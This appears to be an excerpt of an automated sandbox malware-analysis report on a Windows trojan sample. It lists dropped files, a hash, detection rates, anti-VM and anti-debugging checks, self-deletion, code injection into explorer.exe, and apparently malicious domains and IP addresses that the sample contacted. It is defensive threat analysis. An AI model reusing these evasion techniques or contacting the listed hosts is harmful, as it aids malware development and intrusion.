Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_0040196D Sleep,NtTerminateProcess, 11_2_0040196D
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_2_00402000
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose, 11_2_0040250A
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00401A0B NtTerminateProcess, 11_2_00401A0B
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_2_0040201A
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_2_0040201E
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_2_0040202D
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00402084 LocalAlloc,NtQuerySystemInformation, 11_2_00402084
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00402491 NtOpenKey, 11_2_00402491
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_1_00402000
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose, 11_1_0040250A
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_1_0040201A
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_1_0040201E
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_1_0040202D
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_00402084 LocalAlloc,NtQuerySystemInformation, 11_1_00402084
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_00402491 NtOpenKey, 11_1_00402491
PE file contains strange resources
Source: UZ6FEqlix4.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UZ6FEqlix4.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 411F.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 411F.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eveggtb.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eveggtb.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\411F.exe 8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\eveggtb 8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2
Source: UZ6FEqlix4.exe Virustotal: Detection: 58%
Source: UZ6FEqlix4.exe Metadefender: Detection: 20%
Source: UZ6FEqlix4.exe ReversingLabs: Detection: 62%
Source: UZ6FEqlix4.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb
Source: C:\Users\user\AppData\Roaming\eveggtb Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe
Source: C:\Users\user\AppData\Local\Temp\411F.exe Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\eveggtb Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@9/3@24/5
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041C7DF GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA, 0_2_0041C7DF
Source: Window Recorder Window detected: More than 3 window changes detected
Source: UZ6FEqlix4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: UZ6FEqlix4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: UZ6FEqlix4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: UZ6FEqlix4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: UZ6FEqlix4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: UZ6FEqlix4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: UZ6FEqlix4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: "C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr
Source: Binary string: C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_004235C8 push eax; ret 0_2_004235E6
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_008497BF push esi; ret 0_2_008497D5
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0084975A push esi; ret 0_2_008497D5
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00401880 push esi; iretd 1_2_00401893
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00402E94 push es; iretd 1_2_00402EA0
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_00402E94 push es; iretd 1_1_00402EA0
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00401880 push esi; iretd 11_2_00401893
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00402E94 push es; iretd 11_2_00402EA0
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_00402E94 push es; iretd 11_1_00402EA0
PE file contains sections with non-standard names
Source: UZ6FEqlix4.exe Static PE information: section name: .pejevu
Source: UZ6FEqlix4.exe Static PE information: section name: .dozi
Source: 411F.exe.5.dr Static PE information: section name: .pejevu
Source: 411F.exe.5.dr Static PE information: section name: .dozi
Source: eveggtb.5.dr Static PE information: section name: .pejevu
Source: eveggtb.5.dr Static PE information: section name: .dozi
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_00433420 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00433420
Source: initial sample Static PE information: section name: .text entropy: 6.87583252941
Source: initial sample Static PE information: section name: .text entropy: 6.87583252941
Source: initial sample Static PE information: section name: .text entropy: 6.87583252941

Persistence and Installation Behavior:

Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\eveggtb Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\eveggtb Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\411F.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\uz6feqlix4.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\eveggtb:Zone.Identifier read attributes | delete Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: eveggtb, 0000000B.00000002.781404615.0000000001F80000.00000004.00000001.sdmp Binary or memory string: ASWHOOKZ
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6804 Thread sleep count: 602 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5408 Thread sleep count: 386 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5408 Thread sleep time: -38600s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6648 Thread sleep count: 485 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6648 Thread sleep time: -48500s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 1576 Thread sleep count: 482 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6036 Thread sleep count: 398 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6036 Thread sleep time: -39800s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6292 Thread sleep count: 279 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\411F.exe Last function: Thread delayed
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 602 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 386 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 485 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 482 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 398 Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041CA09 __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA, 0_2_0041CA09
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041AA72 TryEnterCriticalSection,BuildCommDCBAndTimeoutsA,GetNamedPipeHandleStateA,ReleaseMutex,AddAtomA,TzSpecificLocalTimeToSystemTime,SetConsoleCursorInfo,VerifyVersionInfoW,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,GetProcessPriorityBoost,FreeEnvironmentStringsA,VerifyVersionInfoA,FindFirstFileExA, 0_2_0041AA72
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe System information queried: ModuleInformation Jump to behavior
Source: explorer.exe, 00000005.00000000.692263832.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.688084068.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.692263832.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.695671128.000000000FCE0000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.
Source: explorer.exe, 00000005.00000000.693313522.000000000A897000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}..
Source: explorer.exe, 00000005.00000000.693313522.000000000A897000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAb
Source: explorer.exe, 00000005.00000000.693313522.000000000A897000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$
Source: explorer.exe, 00000005.00000000.687195483.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.726779211.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.726841267.000000000A783000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb System information queried: CodeIntegrityInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_00424E60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00424E60
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_00433420 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00433420
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041C7DF GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA, 0_2_0041C7DF
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_00845BDC push dword ptr fs:[00000030h] 0_2_00845BDC
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_004027ED LdrLoadDll, 1_1_004027ED
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_00424E60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00424E60
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0042C6D0 SetUnhandledExceptionFilter, 0_2_0042C6D0
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_004283B0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004283B0

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 411F.exe.5.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: unicupload.top
Source: C:\Windows\explorer.exe Network Connect: 185.233.81.115 187
Source: C:\Windows\explorer.exe Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe Domain query: infinity-cheats.com
Source: C:\Windows\explorer.exe Network Connect: 185.186.142.166 80
Source: C:\Windows\explorer.exe Domain query: privacytools-foryou-777.com
Source: C:\Windows\explorer.exe Domain query: data-host-coin-8.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\eveggtb Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\eveggtb Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Thread created: C:\Windows\explorer.exe EIP: 4F41930
Source: C:\Users\user\AppData\Roaming\eveggtb Thread created: unknown EIP: 4F91930
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"
Source: C:\Users\user\AppData\Roaming\eveggtb Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb
Source: C:\Users\user\AppData\Local\Temp\411F.exe Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe
Source: explorer.exe, 00000005.00000000.717104368.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.686588068.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.700174551.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.721547751.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp Binary or memory string: Progman
